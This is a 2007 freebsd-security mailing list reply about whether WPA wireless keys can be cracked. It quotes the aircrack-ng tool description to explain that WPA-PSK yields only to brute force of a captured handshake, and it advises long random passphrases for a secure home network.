testing wireless security

Josh Paetzel josh at tcbug.org
Tue Nov 20 05:57:04 PST 2007

On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote:
> Josh Paetzel wrote:
> > When I looked in to this it seemed that the current state of affairs is
> > that WPA can only be broken by brute-forcing the key.  I don't recall if
> > that could be done 'off-line' or not.  My memory is that the needed info
> > to attempt bruteforcing could be done by simply receiving....no need to
> > attempt to associate to the AP was needed.   I'm not really interested in
> > disseminating links to tools that can be used to break wireless security,
> > but simple google searches will give you the info you need.....and the
> > tools are in the ports tree for the most part.
> >
> > Fortunately WPA allows keys that put even resource-rich attackers in to
> > the decade range to bruteforce.
> That would not appear to be a limitation of aircrack-ng
> http://www.freshports.org/net-mgmt/aircrack-ng/
> aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can
> recover this keys once enough encrypted packets have been captured.
> It implements the standard FMS attack along with some optimizations
> like KoreK attacks, thus making the attack much faster compared to
> other WEP cracking tools. In fact aircrack is a set of tools for
> auditing wireless networks.
> That said, I haven't (yet) tried it myself ;)

Well, if you were to read your own link for a bit you'd eventually find...


Quoting from the page....

WPA/WPA2 supports many types of authentication beyond pre-shared keys. 
aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows 
the network as having the authentication type of PSK, otherwise, don't bother 
trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This 
is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where 
statistical methods can be used to speed up the cracking process, only plain 
brute force techniques can be used against WPA/WPA2. That is, because the key 
is not static, so collecting IVs like when cracking WEP encryption, does not 
speed up the attack. The only thing that does give the information to start 
an attack is the handshake between client and AP. Handshaking is done when 
the client connects to the network. Although not absolutely true, for the 
purposes of this tutorial, consider it true. Since the pre-shared key can be 
from 8 to 63 characters in length, it effectively becomes impossible to crack 
the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word 
or relatively short in length. Conversely, if you want to have an unbreakable 
wireless network at home, use WPA/WPA2 and a 63 character password composed 
of random characters including special symbols.


Josh Paetzel

PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part.
Url : http://lists.freebsd.org/pipermail/freebsd-security/attachments/20071120/3022e25e/attachment.pgp

More information about the freebsd-security mailing list